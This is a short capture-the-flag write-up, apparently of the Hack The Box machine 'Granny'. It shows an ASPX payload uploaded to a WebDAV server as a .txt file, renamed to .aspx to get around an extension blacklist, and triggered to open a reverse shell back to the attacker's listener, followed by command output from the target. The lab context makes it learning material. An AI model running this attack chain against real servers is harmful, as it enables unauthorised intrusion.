InfoSec LAB

Granny_Exploitation

Created: 2 min read

WebDAV

While the target web server has WebDAV enabled with some potentially dangerous method allowed, I found out that I am allowed to upload files with a few extensions. As it was clear that there are some blacklisted extension for security, I found a workaround via renaming the uploaded file to an executable extension using WebDAV methods. Here, I will be exploiting this vulnerability by uploading an ASPX payload to the web server using the method mentioned above.

dav:/> put shell.txt
uploading shell.txt to `/shell.txt':
progress: [=============================>] 100.0% of 2713 bytes succeeded.
dav:/> ls
listing collection `/': succeeded.
coll:   DavTestDir_cXKfKDSxLFfnvce             0  Apr  6 14:13
coll:   _private                               0  Apr 12  2017
coll:   _vti_bin                               0  Apr 12  2017
coll:   _vti_cnf                               0  Apr 12  2017
coll:   _vti_log                               0  Apr 12  2017
coll:   _vti_pvt                               0  Apr 12  2017
coll:   _vti_script                            0  Apr 12  2017
coll:   _vti_txt                               0  Apr 12  2017
coll:   aspnet_client                          0  Apr 12  2017
coll:   images                                 0  Apr 12  2017
        _vti_inf.html                       1754  Apr 12  2017
        iisstart.htm                        1433  Feb 21  2003
        pagerror.gif                        2806  Feb 21  2003
        postinfo.html                       2440  Apr 12  2017
        shell.txt                           2713  apr  6 14:28

Uploading the payload. Notice that the payload has the TXT extension. This is because the WebDAV configuration that the web server has wouldn’t let me upload files with ASPX extension directly

As shown above, the shell.txt file has been uploaded Now, I just need to change the extension to ASPX

dav:/> move shell.txt shell.aspx
moving `/shell.txt' to `/shell.aspx':  succeeded.

Done

┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ curl -s http://$IP/shell.aspx

Triggering it

┌──(kali㉿kali)-[~/archive/htb/labs/granny]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
c:\windows\system32\inetsrv> whoami
 whoami
nt authority\network service
 
c:\windows\system32\inetsrv> hostname
 hostname
granny
 
c:\windows\system32\inetsrv> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ip address. . . . . . . . . . . . : 10.10.10.15
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

Initial Foothold established to the target system as the nt authority\network service user via exploiting WebDAV Interestingly, the hostname of the target system isn’t grandpa, but granny

Interactive Graph View

Backlinks